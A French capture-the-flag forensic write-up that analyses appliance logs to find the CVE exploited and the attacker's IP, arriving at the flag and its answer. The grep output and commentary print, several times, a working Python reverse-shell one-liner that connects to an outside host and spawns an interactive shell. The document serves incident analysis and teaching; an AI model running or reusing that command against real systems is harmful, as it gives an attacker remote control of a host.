Dans la 2e partie de ce challenge nous allons devoir analyser les logs contenus dans l'archive fournie pour trouver la CVE et l'addresse ip de la personne qui a exploité la vulnérabilité.
Analyse des logs
Listons déjà les fichiers :
kali@Tyrell:~/FCSC/2024/forensic/Horreur, malheur 2 - Archive chiffrée$ cd data/
kali@Tyrell:~/FCSC/2024/forensic/Horreur, malheur 2 - Archive chiffrée/data$ ls
var
kali@Tyrell:~/FCSC/2024/forensic/Horreur, malheur 2 - Archive chiffrée/data$ cd var/
kali@Tyrell:~/FCSC/2024/forensic/Horreur, malheur 2 - Archive chiffrée/data/var$ ls
dlogs
kali@Tyrell:~/FCSC/2024/forensic/Horreur, malheur 2 - Archive chiffrée/data/var$ cd dlogs/
kali@Tyrell:~/FCSC/2024/forensic/Horreur, malheur 2 - Archive chiffrée/data/var/dlogs$ ls
aaaservices_rest_server.log config_rest_server.log debuglog esapdata_rest_server.log monrestserver.log nodemonlog.old tasks_rest_server.log.old
aaaservices_rest_server.log.old config_rest_server.log.old debuglog.old esapdata_rest_server.log.old namedusersrestserver.log session_rest_server.log ueba_webserv.log
cav_webserv.log custom_actions_rest_server.log enduserportal_rest_server.log gwpolicy_rest_server.log namedusersrestserver.log.old system_import_debuglog user_import_debuglog
cav_webserv.log.old custom_actions_rest_server.log.old enduserportal_rest_server.log.old gwpolicy_rest_server.log.old nodemonlog tasks_rest_server.log
kali@Tyrell:~/FCSC/2024/forensic/Horreur, malheur 2 - Archive chiffrée/data/var/dlogs$
Nous avons ici une multitudes de fichiers de logs.
Étant donné que nous cherchons une adresse ip, on va utiliser la commande grep pour essayer de les lister :
kali@Tyrell:~/FCSC/2024/forensic/Horreur, malheur 2 - Archive chiffrée/data/var/dlogs$ grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' * | grep -v "127.0.0.1" | grep -v "172.18.0.4"
aaaservices_rest_server.log:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
aaaservices_rest_server.log.old:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
cav_webserv.log:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
grep: debuglog.old : fichiers binaires correspondent
config_rest_server.log:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
config_rest_server.log.old:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
custom_actions_rest_server.log:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
custom_actions_rest_server.log.old:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
debuglog:2024/03/15 03:50:12.321606 dsksyslog(4491) vc0 0 kernel dsksyslog.cc:77 - <6>:warning: process `perl-nopax' used the deprecated sysctl system call with 3.5.16.2.3.
debuglog:2024/03/15 03:50:12.321647 dsksyslog(4491) vc0 0 kernel dsksyslog.cc:77 - <6>:warning: process `perl-nopax' used the deprecated sysctl system call with 3.5.16.2.18.
debuglog:2024/03/15 03:50:13.342606 dsksyslog(4491) vc0 0 kernel dsksyslog.cc:77 - <6>:warning: process `perl-nopax' used the deprecated sysctl system call with 3.5.16.3.18.
debuglog.old:2022/07/15 04:06:42.386691 dsksyslog(3385) vc0 0 kernel dsksyslog.cc:77 - <5>:Linux version 4.15.18.34-production (slt_ec_builder@asg-linux64-0015.lab.psecure.net) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #1 SMP Fri Jun 17 13:08:47 UTC 2022 ()
debuglog.old:2022/07/15 04:06:42.391103 dsksyslog(3385) vc0 0 kernel dsksyslog.cc:77 - <6>:mpt3sas version 17.100.00.00 loaded
enduserportal_rest_server.log:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
enduserportal_rest_server.log.old:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
esapdata_rest_server.log:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
esapdata_rest_server.log.old:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
gwpolicy_rest_server.log:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
gwpolicy_rest_server.log.old:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
monrestserver.log:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
monrestserver.log:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
namedusersrestserver.log:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
namedusersrestserver.log.old:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
nodemonlog:21969 1 0.0 0.0 S 452 4852 3808 /bin/sh -c /home/perl5/bin/perl /home/perl/AwsAzureTestConnection.pl ;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("20.13.3.0",4444));subprocess.call(["/bin/sh","-i
nodemonlog:21971 21969 0.0 0.0 S 2296 9532 7972 python -c import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("20.13.3.0",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())
nodemonlog:22155 22147 0.0 0.0 S 452 4852 3616 /bin/sh -c /home/perl5/bin/perl /home/perl/AwsAzureTestConnection.pl ;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("20.13.3.0",4444));subprocess.call(["/bin/sh","-i
nodemonlog:22157 22155 0.0 0.0 S 2296 9532 8004 python -c import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("20.13.3.0",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())
nodemonlog:dsagentd 6115 root 14u IPv4 52227 0t0 UDP 172.18.1.4:isakmp
nodemonlog:dsagentd 6115 root 15u IPv4 52228 0t0 UDP 172.18.1.4:4500
nodemonlog:Linux 4.15.18.34-production (localhost2) 03/15/24 _x86_64_ (4 CPU)
nodemonlog.old:21969 1 0.0 0.0 S 452 4852 3808 /bin/sh -c /home/perl5/bin/perl /home/perl/AwsAzureTestConnection.pl ;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("20.13.3.0",4444));subprocess.call(["/bin/sh","-i
nodemonlog.old:21971 21969 0.0 0.0 S 2296 9532 7972 python -c import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("20.13.3.0",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())
nodemonlog.old:22155 22147 0.0 0.0 S 452 4852 3616 /bin/sh -c /home/perl5/bin/perl /home/perl/AwsAzureTestConnection.pl ;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("20.13.3.0",4444));subprocess.call(["/bin/sh","-i
nodemonlog.old:22157 22155 0.0 0.0 S 2296 9532 8004 python -c import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("20.13.3.0",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())
nodemonlog.old:dsagentd 6115 root 14u IPv4 52227 0t0 UDP 172.18.1.4:isakmp
nodemonlog.old:dsagentd 6115 root 15u IPv4 52228 0t0 UDP 172.18.1.4:4500
grep: system_import_debuglog : fichiers binaires correspondent
nodemonlog.old:Linux 4.15.18.34-production (localhost2) 03/15/24 _x86_64_ (4 CPU)
session_rest_server.log:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
system_import_debuglog:2022/07/15 04:06:42.386691 dsksyslog(3385) vc0 0 kernel dsksyslog.cc:77 - <5>:Linux version 4.15.18.34-production (slt_ec_builder@asg-linux64-0015.lab.psecure.net) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #1 SMP Fri Jun 17 13:08:47 UTC 2022 ()
system_import_debuglog:2022/07/15 04:06:42.391103 dsksyslog(3385) vc0 0 kernel dsksyslog.cc:77 - <6>:mpt3sas version 17.100.00.00 loaded
tasks_rest_server.log:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
tasks_rest_server.log.old:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
ueba_webserv.log:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
Nous remarquons tout de suite les lignes suivantes :
namedusersrestserver.log.old:os: Linux-4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022
nodemonlog:21969 1 0.0 0.0 S 452 4852 3808 /bin/sh -c /home/perl5/bin/perl /home/perl/AwsAzureTestConnection.pl ;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("20.13.3.0",4444));subprocess.call(["/bin/sh","-i
nodemonlog:21971 21969 0.0 0.0 S 2296 9532 7972 python -c import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("20.13.3.0",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())
nodemonlog:22155 22147 0.0 0.0 S 452 4852 3616 /bin/sh -c /home/perl5/bin/perl /home/perl/AwsAzureTestConnection.pl ;python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("20.13.3.0",4444));subprocess.call(["/bin/sh","-i
nodemonlog:22157 22155 0.0 0.0 S 2296 9532 8004 python -c import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("20.13.3.0",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())
Et plus spécifiquement :
python -c import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("20.13.3.0",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())`
Cette commande ouvre un reverse shell vers une machine. L'attaquant a récupéré ici un reverse shell sur sa machine pirate dont l'addresse ip est 20.13.3.0.
Nous avons ici une partie de flag. Il manque la CVE utilisée pour exploiter la faille. Si vous avez lu la première partie de ce challenge, nous étions tombé sur l'article suivant :
Cet article parle de 2 CVEs : CVE-2023-46805 (Authentication Bypass) & CVE-2024-21887 (Remote Command Execution).
J'ai testé le flag avec la CVE-2023-46805, et par chance, c'était bien cette CVE qui a été utilisée.
Flag : FCSC{CVE-2023-46805:20.13.3.0}
